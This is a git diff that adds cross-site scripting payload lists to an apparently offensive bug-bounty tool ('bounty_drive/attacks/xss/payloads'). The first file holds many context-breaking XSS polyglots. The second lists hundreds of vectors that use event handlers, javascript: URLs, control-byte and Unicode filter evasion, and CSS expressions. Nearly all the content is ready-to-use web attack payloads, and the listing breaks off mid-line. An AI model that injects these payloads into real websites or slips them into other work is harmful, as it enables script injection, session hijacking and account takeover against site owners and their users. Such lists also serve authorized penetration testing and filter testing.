+javascript:/*-->'//"//`//\"//</title></textarea></style></noscript></script></noembed></template><script>/*<frame/<svg */ onload=alert()//</script> +javascript:/*"/*'/*`/*\"/*</script/</title/</textarea/</style/</noscript></template></noembed>--><script>/*<svg <frame */ onload=alert()//</script> +javascript:/*"/*'/*\"/*`/*--></title></noembed></template></textarea></noscript></style></script><script>//<frame <svg */ onload=alert()//</script> +javascript:/*"/*`/*'/*\"/*--></title></script></textarea></noscript></style></noembed></template><script> /*<svg <frame onload=/**/alert()//</script> +javascript:"/*'//`//\"//</title></template/</textarea/</style/</noscript/</noembed/</script>--><<script>alert()<</script><frame/*/ onload=alert()//> +javascript:alert()"//</title></textarea></style></noscript></noembed></template></script>\"//'//`//--><script>//<svg <frame */onload= alert()//</script> +javascript:/*"/*`/*'/*\"/*</script></style></template></select></title></textarea></noscript></noembed><frame/onload=alert()--><<svg/*/ onload=alert()//> +javascript:"/*`/*\"/*' /*</stYle/</titLe/</teXtarEa/</nOscript></Script></noembed></select></template><FRAME/onload=/**/alert()//--><<sVg/onload=alert``> +javascript:/*--></script></textarea></style></noscript>\"</noembed>[`</template>["</select>['</title>]<<script>///<frame */ onload=alert()//<</script> +javascript:"/*\"/*'/*`/*--></noembed></template></noscript></title></textarea></style></script></select><frame/onload=alert()><<svg/onload= /**/alert()//> +javascript:/*"/*`/*'/*\"/*--></title></textarea></noscript></noembed></template></style></script><<script> /**/alert()//<</script><frame onload=alert()> +javascript:"/*\"/*'/*--></title></textarea></style></noscript></template></noembed></script><<script>/*` /*<frame src=javascript:/**/alert()//><</script> +javascript:"/*'/*\"/*` /**/alert()//--></title></textarea></style></noscript></noembed></template></script><script>alert()</script><svg/<frame/onload=alert()> +javascript:/*"/*`/*'/*\"/*-->*/ alert()//</title></textarea></style></noscript></noembed></template></script></select><frame/onload=alert``><<svg/onload=alert()> +javascript:`/*</title></style></textarea></noscript></script></noembed></template></select/"/'/*--><frame onload=alert()><svg/\"/*<svg onload=' /**/-alert()//'>javascript:/*`/*\"/*'/*</noembed>"/*<frame src=javascript:/**/;alert()//--></title></textarea></style></noscript></template></select></script><<svg/onload= alert()//> +javascript:alert()//"/*`/*'/*\"/*--></title></textarea></noscript></noembed></template></style></script>*/ alert()//<frame onload=alert()><<script>alert()<</script> +javascript:alert()//'//"//\"//-->`//*/ alert();//</title></textarea></style></noscript></noembed></template><frame onload=alert()></select></script><<svg onload=alert()> +javascript:/*"/*\"/*`/*'/**/ (alert())//</title></textarea></style></noscript></script></noembed></template></select><frame src=javascript:alert()--><<svg/onload=alert()> +javascript:/*"/*'/*\"/*`/*><frame src=javascript:alert()></template </textarea </title </style </noscript </noembed </script --><<script>alert()<</script>\ /**/alert()// +javascript:/*`/*'/*'/*"-/*\"/**/ alert()//></title></textarea></style></select></script></noembed></noscript></template>--><<svg/onload=alert()><frame/src=javascript:alert()> +javascript:'/*`/*'/*"/*\"/*<FRAME SRC= javascript:/**/-alert()//--></title></textarea></style></noscript></noembed></template></script><script>//<svg onload= alert()//</script> +javascript:alert()//--></title></style></noscript></noembed></template></select></textarea><frameset onload=alert()></script>*///\"//`//'//"//><svg <svg onload=alert()> alert()// +javascript:alert()//'//"//\"; '/`/*\/*'/*"/**/(alert())//</style></template/</title/</textarea/</noscript/</noembed/</script>--><frame <svg onload=alert()><script>alert()</script> +javascript:/*"/*'/*`/*\"/**/ alert()//*</title></textarea></style></noscript></noembed></template></option></select></SCRIPT>--><<svg onload=alert()><frame src=javascript:alert()> +javascript:alert()//\"//`//'//"//--></style></select></noscript></noembed></template></title></textarea></script><iframe/srcdoc="<svg/onload=alert()>"><frame/onload=alert()>*/ alert()// +javascript:alert()//*-->*`/*'/*"/*\"/*</title></textarea></style></noscript></noembed></template><frame src=javascript:alert()></script><script>/*<svg onload=alert()>*/ alert()//</script> +jaVasCript:/*`/*\`/*'/*\"//"/**/(onload=alert())//<svg/onload=alert()><frame/onload=alert()></select></noscript></noembed></template></stYle/</titLe/</teXtarEa/</script/--><sVg/oNloAd= alert()//> +javascript:alert()//'//"//`//></a></option></select></template></noscript></script></title></style></textarea></noembed>--><<svg onload=alert()>\">alert()//*/ alert()//<frame src=javascript:alert()> +javascript:alert()//\ /*<svg/onload=';alert();'></textarea></style></title></noscript></template></noembed><frame onload=";alert();"></script>--><script>alert`;alert();`</script>*/alert()//\";alert()// +javascript:alert/*`/*\/*'/*\"/*"/**/(alert())// alert()//--></template><frame/onload=alert() <img src=x onerror=alert()></style/</title/</textarea/</noscript/</noembed/</script><script>alert()</script> +javascript:alert();//</title></noscript></noembed></template></style></textarea><frameset onload='+/"/+/[*/[]/+alert()//'-->\" alert();/*`/**/(/**/alert())//<script>alert()</script><<svg onload=alert()>> +javascript:alert()//*/alert()/*'-/"/-eval(`(alert())`)//\"-alert()//--></title></style></noscript></textarea></template></noembed><script>alert()</script><frameset onload=alert()><svg/onload=alert(1)> alert()// +javascript:alert()//\";alert();/*-/*`/*\`/*'/*"/**///--><FRAME SRC="javascript:alert();"></textarea></style></noscript></noembed></template></option></select></script></title><svg/onload=alert()><svg/onload=alert()> alert(1)// +javascript:alert()//<frame/src=javascript:alert()><svg/onload=alert()>`;alert()`';alert()//\";alert();//"//--></title></textarea></style></noscript></noembed></template></option></select></script><svg onload=alert()>*/ alert()//* +javascript:alert()//</title></style></textarea></noscript></template></noembed><script>alert()</script>-->\";alert()//";alert()//';alert()//<script>alert()</script><frame src="javascript:alert()">` alert()//<svg/onload=alert()>*/alert()/* +javascript:alert();//<img src=x:x onerror=alert(1)>\";alert();//";alert();//';alert();//`;alert();// alert();//*/alert();//--></title></textarea></style></noscript></noembed></template></select></script><frame src=javascript:alert()><svg onload=alert()><!-- +javascript:/*--></title></style></template></noscript></noembed></textarea></script><svg/onload='+/"/+/onclick=1/+/[*/[]/+alert()//'>"><svg/onload=`+/"/+/onclick=/+/[*/[]/+alert()//'>"><script>alert()</script><frame src="javascript:alert()"></frameset>+\"; alert()//<img src onerror=alert()> +javascript:alert(1)//\";alert(1);<!--jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//--><FRAME SRC="javascript:alert(1);"></textarea></style></iframe></noscript></noembed></template></option></select></script><img src=x onerror=alert(1)></title><script>alert(1)</script><img src=0 onerror=alert(1)><img src=x:x onerror=alert(1)> alert(1)// diff --git a/bounty_drive/attacks/xss/payloads/XSS-payloadbox.txt b/bounty_drive/attacks/xss/payloads/XSS-payloadbox.txt new file mode 100644 index 0000000..542c085 --- /dev/null +++ b/bounty_drive/attacks/xss/payloads/XSS-payloadbox.txt @@ -0,0 +1,2690 @@ +"-prompt(8)-" +'-prompt(8)-' +";a=prompt,a()// +';a=prompt,a()// +'-eval("window['pro'%2B'mpt'](8)")-' +"-eval("window['pro'%2B'mpt'](8)")-" +"onclick=prompt(8)>"@x.y +"onclick=prompt(8)><svg/onload=prompt(8)>"@x.y +<image/src/onerror=prompt(8)> +<img/src/onerror=prompt(8)> +<image src/onerror=prompt(8)> +<img src/onerror=prompt(8)> +<image src =q onerror=prompt(8)> +<img src =q onerror=prompt(8)> +</scrip</script>t><img src =q onerror=prompt(8)> +<script\x20type="text/javascript">javascript:alert(1);</script> +<script\x3Etype="text/javascript">javascript:alert(1);</script> +<script\x0Dtype="text/javascript">javascript:alert(1);</script> +<script\x09type="text/javascript">javascript:alert(1);</script> +<script\x0Ctype="text/javascript">javascript:alert(1);</script> +<script\x2Ftype="text/javascript">javascript:alert(1);</script> +<script\x0Atype="text/javascript">javascript:alert(1);</script> +'`"><\x3Cscript>javascript:alert(1)</script> +'`"><\x00script>javascript:alert(1)</script> +<img src=1 href=1 onerror="javascript:alert(1)"></img> +<audio src=1 href=1 onerror="javascript:alert(1)"></audio> +<video src=1 href=1 onerror="javascript:alert(1)"></video> +<body src=1 href=1 onerror="javascript:alert(1)"></body> +<image src=1 href=1 onerror="javascript:alert(1)"></image> +<object src=1 href=1 onerror="javascript:alert(1)"></object> +<script src=1 href=1 onerror="javascript:alert(1)"></script> +<svg onResize svg onResize="javascript:javascript:alert(1)"></svg onResize> +<title onPropertyChange title onPropertyChange="javascript:javascript:alert(1)"></title onPropertyChange> +<iframe onLoad iframe onLoad="javascript:javascript:alert(1)"></iframe onLoad> +<body onMouseEnter body onMouseEnter="javascript:javascript:alert(1)"></body onMouseEnter> +<body onFocus body onFocus="javascript:javascript:alert(1)"></body onFocus> +<frameset onScroll frameset onScroll="javascript:javascript:alert(1)"></frameset onScroll> +<script onReadyStateChange script onReadyStateChange="javascript:javascript:alert(1)"></script onReadyStateChange> +<html onMouseUp html onMouseUp="javascript:javascript:alert(1)"></html onMouseUp> +<body onPropertyChange body onPropertyChange="javascript:javascript:alert(1)"></body onPropertyChange> +<svg onLoad svg onLoad="javascript:javascript:alert(1)"></svg onLoad> +<body onPageHide body onPageHide="javascript:javascript:alert(1)"></body onPageHide> +<body onMouseOver body onMouseOver="javascript:javascript:alert(1)"></body onMouseOver> +<body onUnload body onUnload="javascript:javascript:alert(1)"></body onUnload> +<body onLoad body onLoad="javascript:javascript:alert(1)"></body onLoad> +<bgsound onPropertyChange bgsound onPropertyChange="javascript:javascript:alert(1)"></bgsound onPropertyChange> +<html onMouseLeave html onMouseLeave="javascript:javascript:alert(1)"></html onMouseLeave> +<html onMouseWheel html onMouseWheel="javascript:javascript:alert(1)"></html onMouseWheel> +<style onLoad style onLoad="javascript:javascript:alert(1)"></style onLoad> +<iframe onReadyStateChange iframe onReadyStateChange="javascript:javascript:alert(1)"></iframe onReadyStateChange> +<body onPageShow body onPageShow="javascript:javascript:alert(1)"></body onPageShow> +<style onReadyStateChange style onReadyStateChange="javascript:javascript:alert(1)"></style onReadyStateChange> +<frameset onFocus frameset onFocus="javascript:javascript:alert(1)"></frameset onFocus> +<applet onError applet onError="javascript:javascript:alert(1)"></applet onError> +<marquee onStart marquee onStart="javascript:javascript:alert(1)"></marquee onStart> +<script onLoad script onLoad="javascript:javascript:alert(1)"></script onLoad> +<html onMouseOver html onMouseOver="javascript:javascript:alert(1)"></html onMouseOver> +<html onMouseEnter html onMouseEnter="javascript:parent.javascript:alert(1)"></html onMouseEnter> +<body onBeforeUnload body onBeforeUnload="javascript:javascript:alert(1)"></body onBeforeUnload> +<html onMouseDown html onMouseDown="javascript:javascript:alert(1)"></html onMouseDown> +<marquee onScroll marquee onScroll="javascript:javascript:alert(1)"></marquee onScroll> +<xml onPropertyChange xml onPropertyChange="javascript:javascript:alert(1)"></xml onPropertyChange> +<frameset onBlur frameset onBlur="javascript:javascript:alert(1)"></frameset onBlur> +<applet onReadyStateChange applet onReadyStateChange="javascript:javascript:alert(1)"></applet onReadyStateChange> +<svg onUnload svg onUnload="javascript:javascript:alert(1)"></svg onUnload> +<html onMouseOut html onMouseOut="javascript:javascript:alert(1)"></html onMouseOut> +<body onMouseMove body onMouseMove="javascript:javascript:alert(1)"></body onMouseMove> +<body onResize body onResize="javascript:javascript:alert(1)"></body onResize> +<object onError object onError="javascript:javascript:alert(1)"></object onError> +<body onPopState body onPopState="javascript:javascript:alert(1)"></body onPopState> +<html onMouseMove html onMouseMove="javascript:javascript:alert(1)"></html onMouseMove> +<applet onreadystatechange applet onreadystatechange="javascript:javascript:alert(1)"></applet onreadystatechange> +<body onpagehide body onpagehide="javascript:javascript:alert(1)"></body onpagehide> +<svg onunload svg onunload="javascript:javascript:alert(1)"></svg onunload> +<applet onerror applet onerror="javascript:javascript:alert(1)"></applet onerror> +<body onkeyup body onkeyup="javascript:javascript:alert(1)"></body onkeyup> +<body onunload body onunload="javascript:javascript:alert(1)"></body onunload> +<iframe onload iframe onload="javascript:javascript:alert(1)"></iframe onload> +<body onload body onload="javascript:javascript:alert(1)"></body onload> +<html onmouseover html onmouseover="javascript:javascript:alert(1)"></html onmouseover> +<object onbeforeload object onbeforeload="javascript:javascript:alert(1)"></object onbeforeload> +<body onbeforeunload body onbeforeunload="javascript:javascript:alert(1)"></body onbeforeunload> +<body onfocus body onfocus="javascript:javascript:alert(1)"></body onfocus> +<body onkeydown body onkeydown="javascript:javascript:alert(1)"></body onkeydown> +<iframe onbeforeload iframe onbeforeload="javascript:javascript:alert(1)"></iframe onbeforeload> +<iframe src iframe src="javascript:javascript:alert(1)"></iframe src> +<svg onload svg onload="javascript:javascript:alert(1)"></svg onload> +<html onmousemove html onmousemove="javascript:javascript:alert(1)"></html onmousemove> +<body onblur body onblur="javascript:javascript:alert(1)"></body onblur> +\x3Cscript>javascript:alert(1)</script> +'"`><script>/* *\x2Fjavascript:alert(1)// */</script> +<script>javascript:alert(1)</script\x0D +<script>javascript:alert(1)</script\x0A +<script>javascript:alert(1)</script\x0B +<script charset="\x22>javascript:alert(1)</script> +<!--\x3E<img src=xxx:x onerror=javascript:alert(1)> --> +--><!-- ---> <img src=xxx:x onerror=javascript:alert(1)> --> +--><!-- --\x00> <img src=xxx:x onerror=javascript:alert(1)> --> +--><!-- --\x21> <img src=xxx:x onerror=javascript:alert(1)> --> +--><!-- --\x3E> <img src=xxx:x onerror=javascript:alert(1)> --> +`"'><img src='#\x27 onerror=javascript:alert(1)> +<a href="javascript\x3Ajavascript:alert(1)" id="fuzzelement1">test</a> +"'`><p><svg><script>a='hello\x27;javascript:alert(1)//';</script></p> +<a href="javas\x00cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x07cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x0Dcript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x0Acript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x08cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x02cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x03cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x04cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x01cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x05cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x0Bcript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x09cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x06cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x0Ccript:javascript:alert(1)" id="fuzzelement1">test</a> +<script>/* *\x2A/javascript:alert(1)// */</script> +<script>/* *\x00/javascript:alert(1)// */</script> +<style></style\x3E<img src="about:blank" onerror=javascript:alert(1)//></style> +<style></style\x0D<img src="about:blank" onerror=javascript:alert(1)//></style> +<style></style\x09<img src="about:blank" onerror=javascript:alert(1)//></style> +<style></style\x20<img src="about:blank" onerror=javascript:alert(1)//></style> +<style></style\x0A<img src="about:blank" onerror=javascript:alert(1)//></style> +"'`>ABC<div style="font-family:'foo'\x7Dx:expression(javascript:alert(1);/*';">DEF +"'`>ABC<div style="font-family:'foo'\x3Bx:expression(javascript:alert(1);/*';">DEF +%253Cscript%253Ealert('XSS')%253C%252Fscript%253E +<script>if("x\\xE1\x96\x89".length==2) { javascript:alert(1);}</script> +<script>if("x\\xE0\xB9\x92".length==2) { javascript:alert(1);}</script> +<script>if("x\\xEE\xA9\x93".length==2) { javascript:alert(1);}</script> +'`"><\x3Cscript>javascript:alert(1)</script> +'`"><\x00script>javascript:alert(1)</script> +"'`><\x3Cimg src=xxx:x onerror=javascript:alert(1)> +"'`><\x00img src=xxx:x onerror=javascript:alert(1)> +<script src="data:text/plain\x2Cjavascript:alert(1)"></script> +<script src="data:\xD4\x8F,javascript:alert(1)"></script> +<script src="data:\xE0\xA4\x98,javascript:alert(1)"></script> +<script src="data:\xCB\x8F,javascript:alert(1)"></script> +<script\x20type="text/javascript">javascript:alert(1);</script> +<script\x3Etype="text/javascript">javascript:alert(1);</script> +<script\x0Dtype="text/javascript">javascript:alert(1);</script> +<script\x09type="text/javascript">javascript:alert(1);</script> +<script\x0Ctype="text/javascript">javascript:alert(1);</script> +<script\x2Ftype="text/javascript">javascript:alert(1);</script> +<script\x0Atype="text/javascript">javascript:alert(1);</script> +ABC<div style="x\x3Aexpression(javascript:alert(1)">DEF +ABC<div style="x:expression\x5C(javascript:alert(1)">DEF +ABC<div style="x:expression\x00(javascript:alert(1)">DEF +ABC<div style="x:exp\x00ression(javascript:alert(1)">DEF +ABC<div style="x:exp\x5Cression(javascript:alert(1)">DEF +ABC<div style="x:\x0Aexpression(javascript:alert(1)">DEF +ABC<div style="x:\x09expression(javascript:alert(1)">DEF +ABC<div style="x:\xE3\x80\x80expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x84expression(javascript:alert(1)">DEF +ABC<div style="x:\xC2\xA0expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x80expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x8Aexpression(javascript:alert(1)">DEF +ABC<div style="x:\x0Dexpression(javascript:alert(1)">DEF +ABC<div style="x:\x0Cexpression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x87expression(javascript:alert(1)">DEF +ABC<div style="x:\xEF\xBB\xBFexpression(javascript:alert(1)">DEF +ABC<div style="x:\x20expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x88expression(javascript:alert(1)">DEF +ABC<div style="x:\x00expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x8Bexpression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x86expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x85expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x82expression(javascript:alert(1)">DEF +ABC<div style="x:\x0Bexpression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x81expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x83expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x89expression(javascript:alert(1)">DEF +<a href="\x0Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xC2\xA0javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x05javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE1\xA0\x8Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x18javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x11javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x88javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x89javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x17javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x03javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x00javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x10javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x82javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x20javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x13javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x09javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x8Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x14javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x19javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\xAFjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x81javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Djavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x87javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x07javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE1\x9A\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x83javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x04javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x01javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x08javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x84javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x86javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE3\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x12javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Djavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x15javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\xA8javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x16javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x02javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x06javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\xA9javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x85javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x81\x9Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x00:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x3A:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x09:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x0D:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x0A:javascript:alert(1)" id="fuzzelement1">test</a> +`"'><img src=xxx:x \x0Aonerror=javascript:alert(1)> +`"'><img src=xxx:x \x22onerror=javascript:alert(1)> +`"'><img src=xxx:x \x0Bonerror=javascript:alert(1)> +`"'><img src=xxx:x \x0Donerror=javascript:alert(1)> +`"'><img src=xxx:x \x2Fonerror=javascript:alert(1)> +`"'><img src=xxx:x \x09onerror=javascript:alert(1)> +`"'><img src=xxx:x \x0Conerror=javascript:alert(1)> +`"'><img src=xxx:x \x00onerror=javascript:alert(1)> +`"'><img src=xxx:x \x27onerror=javascript:alert(1)> +`"'><img src=xxx:x \x20onerror=javascript:alert(1)> +"`'><script>\x3Bjavascript:alert(1)</script> +"`'><script>\x0Djavascript:alert(1)</script> +"`'><script>\xEF\xBB\xBFjavascript:alert(1)</script> +"`'><script>\xE2\x80\x81javascript:alert(1)</script> +"`'><script>\xE2\x80\x84javascript:alert(1)</script> +"`'><script>\xE3\x80\x80javascript:alert(1)</script> +"`'><script>\x09javascript:alert(1)</script> +"`'><script>\xE2\x80\x89javascript:alert(1)</script> +"`'><script>\xE2\x80\x85javascript:alert(1)</script> +"`'><script>\xE2\x80\x88javascript:alert(1)</script> +"`'><script>\x00javascript:alert(1)</script> +"`'><script>\xE2\x80\xA8javascript:alert(1)</script> +"`'><script>\xE2\x80\x8Ajavascript:alert(1)</script> +"`'><script>\xE1\x9A\x80javascript:alert(1)</script> +"`'><script>\x0Cjavascript:alert(1)</script> +"`'><script>\x2Bjavascript:alert(1)</script> +"`'><script>\xF0\x90\x96\x9Ajavascript:alert(1)</script> +"`'><script>-javascript:alert(1)</script> +"`'><script>\x0Ajavascript:alert(1)</script> +"`'><script>\xE2\x80\xAFjavascript:alert(1)</script> +"`'><script>\x7Ejavascript:alert(1)</script> +"`'><script>\xE2\x80\x87javascript:alert(1)</script> +"`'><script>\xE2\x81\x9Fjavascript:alert(1)</script> +"`'><script>\xE2\x80\xA9javascript:alert(1)</script> +"`'><script>\xC2\x85javascript:alert(1)</script> +"`'><script>\xEF\xBF\xAEjavascript:alert(1)</script> +"`'><script>\xE2\x80\x83javascript:alert(1)</script> +"`'><script>\xE2\x80\x8Bjavascript:alert(1)</script> +"`'><script>\xEF\xBF\xBEjavascript:alert(1)</script> +"`'><script>\xE2\x80\x80javascript:alert(1)</script> +"`'><script>\x21javascript:alert(1)</script> +"`'><script>\xE2\x80\x82javascript:alert(1)</script> +"`'><script>\xE2\x80\x86javascript:alert(1)</script> +"`'><script>\xE1\xA0\x8Ejavascript:alert(1)</script> +"`'><script>\x0Bjavascript:alert(1)</script> +"`'><script>\x20javascript:alert(1)</script> +"`'><script>\xC2\xA0javascript:alert(1)</script> +"/><img/onerror=\x0Bjavascript:alert(1)\x0Bsrc=xxx:x /> +"/><img/onerror=\x22javascript:alert(1)\x22src=xxx:x /> +"/><img/onerror=\x09javascript:alert(1)\x09src=xxx:x /> +"/><img/onerror=\x27javascript:alert(1)\x27src=xxx:x /> +"/><img/onerror=\x0Ajavascript:alert(1)\x0Asrc=xxx:x /> +"/><img/onerror=\x0Cjavascript:alert(1)\x0Csrc=xxx:x /> +"/><img/onerror=\x0Djavascript:alert(1)\x0Dsrc=xxx:x /> +"/><img/onerror=\x60javascript:alert(1)\x60src=xxx:x /> +"/><img/onerror=\x20javascript:alert(1)\x20src=xxx:x /> +<script\x2F>javascript:alert(1)</script> +<script\x20>javascript:alert(1)</script> +<script\x0D>javascript:alert(1)</script> +<script\x0A>javascript:alert(1)</script> +<script\x0C>javascript:alert(1)</script> +<script\x00>javascript:alert(1)</script> +<script\x09>javascript:alert(1)</script> +`"'><img src=xxx:x onerror\x0B=javascript:alert(1)> +`"'><img src=xxx:x onerror\x00=javascript:alert(1)> +`"'><img src=xxx:x onerror\x0C=javascript:alert(1)> +`"'><img src=xxx:x onerror\x0D=javascript:alert(1)> +`"'><img src=xxx:x onerror\x20=javascript:alert(1)> +`"'><img src=xxx:x onerror\x0A=javascript:alert(1)> +`"'><img src=xxx:x onerror\x09=javascript:alert(1)> +<script>javascript:alert(1)<\x00/script> +<img src=# onerror\x3D"javascript:alert(1)" > +<input onfocus=javascript:alert(1) autofocus> +<input onblur=javascript:alert(1) autofocus><input autofocus> +<video poster=javascript:javascript:alert(1)// +<body onscroll=javascript:alert(1)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus> +<form id=test onforminput=javascript:alert(1)><input></form><button form=test onformchange=javascript:alert(1)>X +<video><source onerror="javascript:javascript:alert(1)"> +<video onerror="javascript:javascript:alert(1)"><source> +<form><button formaction="javascript:javascript:alert(1)">X +<body oninput=javascript:alert(1)><input autofocus> +<math href="javascript:javascript:alert(1)">CLICKME</math> <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(1)">CLICKME</maction> </math> +<frameset onload=javascript:alert(1)> +<table background="javascript:javascript:alert(1)"> +<!--<img src="--><img src=x onerror=javascript:alert(1)//"> +<comment><img src="</comment><img src=x onerror=javascript:alert(1))//"> +<![><img src="]><img src=x onerror=javascript:alert(1)//"> +<style><img src="</style><img src=x onerror=javascript:alert(1)//"> +<li style=list-style:url() onerror=javascript:alert(1)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(1)></div> +<head><base href="javascript://"></head><body><a href="/. /,javascript:alert(1)//#">XXX</a></body> +<SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(1)</SCRIPT> +<OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT> +<object data="data:text/html;base64,%(base64)s"> +<embed src="data:text/html;base64,%(base64)s"> +<b <script>alert(1)</script>0 +<div id="div1"><input value="``onmouseover=javascript:alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script> +<x '="foo"><x foo='><img src=x onerror=javascript:alert(1)//'> +<embed src="javascript:alert(1)"> +<img src="javascript:alert(1)"> +<image src="javascript:alert(1)"> +<script src="javascript:alert(1)"> +<div style=width:1px;filter:glow onfilterchange=javascript:alert(1)>x +<? foo="><script>javascript:alert(1)</script>"> +<! foo="><script>javascript:alert(1)</script>"> +</ foo="><script>javascript:alert(1)</script>"> +<? foo="><x foo='?><script>javascript:alert(1)</script>'>"> +<! foo="[[[Inception]]"><x foo="]foo><script>javascript:alert(1)</script>"> +<% foo><x foo="%><script>javascript:alert(1)</script>"> +<div id=d><x xmlns="><iframe onload=javascript:alert(1)"></div> <script>d.innerHTML=d.innerHTML</script> +<img \x00src=x onerror="alert(1)"> +<img \x47src=x onerror="javascript:alert(1)"> +<img \x11src=x onerror="javascript:alert(1)"> +<img \x12src=x onerror="javascript:alert(1)"> +<img\x47src=x onerror="javascript:alert(1)"> +<img\x10src=x onerror="javascript:alert(1)"> +<img\x13src=x onerror="javascript:alert(1)"> +<img\x32src=x onerror="javascript:alert(1)"> +<img\x47src=x onerror="javascript:alert(1)"> +<img\x11src=x onerror="javascript:alert(1)"> +<img \x47src=x onerror="javascript:alert(1)"> +<img \x34src=x onerror="javascript:alert(1)"> +<img \x39src=x onerror="javascript:alert(1)"> +<img \x00src=x onerror="javascript:alert(1)"> +<img src\x09=x 